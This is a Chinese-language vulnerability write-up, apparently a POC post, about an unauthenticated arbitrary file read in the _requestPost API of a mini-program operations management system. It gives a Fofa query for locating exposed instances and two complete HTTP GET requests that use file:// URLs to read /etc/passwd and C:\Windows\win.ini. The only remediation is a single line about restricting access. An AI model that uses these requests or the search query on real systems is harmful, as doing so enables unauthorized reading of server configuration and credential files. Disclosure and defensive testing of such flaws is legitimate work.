万能小程序运营管理系统 _requestPost 任意文件读取漏洞

0x01 产品描述：

        万能小程序运营管理系统是一种功能全面的系统，旨在帮助开发者和运营人员更好地管理和推广小程序。该系统集成了多种功能模块，覆盖了从小程序开发、部署到运营管理的全链条服务。系统通过提供丰富的功能和工具，帮助用户轻松搭建、管理和优化小程序。该系统支持多平台部署，包括微信小程序、支付宝小程序、百度小程序、QQ小程序等，满足不同用户的需求。

0x02 漏洞描述：

        万能小程序运营管理系统 _requestPost 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 搜索语句：

Fofa：body="/com/css/head_foot.css" || body="/com/css/iconfont"

0x04 漏洞复现：

linux系统

GET /api/wxapps/_requestPost?data=1&url=file:///etc/passwd HTTP/1.1
Host: your-ip
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 35

 

windows系统：

 

GET /api/wxapps/_requestPost?data=1&url=file://C:\Windows\win.ini HTTP/1.1
Host: your-ip
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 35

 

0x05 修复建议：

关闭互联网暴露面或接口设置访问权限。